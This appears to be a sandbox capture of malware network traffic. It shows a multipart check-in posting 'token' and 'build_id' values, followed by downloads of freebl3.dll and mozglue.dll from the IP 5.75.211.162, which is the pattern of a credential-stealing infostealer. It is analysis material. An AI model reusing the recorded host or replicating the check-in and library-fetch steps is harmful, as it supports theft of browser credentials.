2024-09-25 16:00:37 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 33 39 66 30 65 30 61 33 61 37 34 39 62 66 62 62 64 35 37 61 33 62 62 32 66 64 62 65 62 33 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="token"439f0e0a3a749bfbbd57a3bb2fdbeb34------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------EHJKFCGHIDHCBGDHJKEBCont
2024-09-25 16:00:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 16:00:38 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:39 UTC	196	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:39 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:39 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Wednesday, 25-Sep-2024 16:00:39 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 16:00:39 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-09-25 16:00:39 UTC	16384	IN	Data Raw: 0c ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-25 16:00:39 UTC	16384	IN	Data Raw: f2 c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-09-25 16:00:39 UTC	16384	IN	Data Raw: 8b 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-25 16:00:40 UTC	16384	IN	Data Raw: ee 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-25 16:00:40 UTC	16384	IN	Data Raw: 00 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-25 16:00:40 UTC	16384	IN	Data Raw: c4 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-25 16:00:40 UTC	16384	IN	Data Raw: 8b 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-09-25 16:00:40 UTC	16384	IN	Data Raw: 77 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 Data Ascii: w8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-09-25 16:00:40 UTC	16384	IN	Data Raw: e8 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 Data Ascii: ,0<48%8A)$

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:41 UTC	196	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:41 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:41 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Wednesday, 25-Sep-2024 16:00:41 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 16:00:41 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-25 16:00:41 UTC	16384	IN	Data Raw: 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
2024-09-25 16:00:41 UTC	16384	IN	Data Raw: ff ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc
2024-09-25 16:00:41 UTC	16384	IN	Data Raw: e9 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-25 16:00:41 UTC	16384	IN	Data Raw: 00 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-25 16:00:41 UTC	16384	IN	Data Raw: e9 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-09-25 16:00:41 UTC	16384	IN	Data Raw: 04 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$
2024-09-25 16:00:41 UTC	16384	IN	Data Raw: 81 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3
2024-09-25 16:00:41 UTC	16384	IN	Data Raw: 0b 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
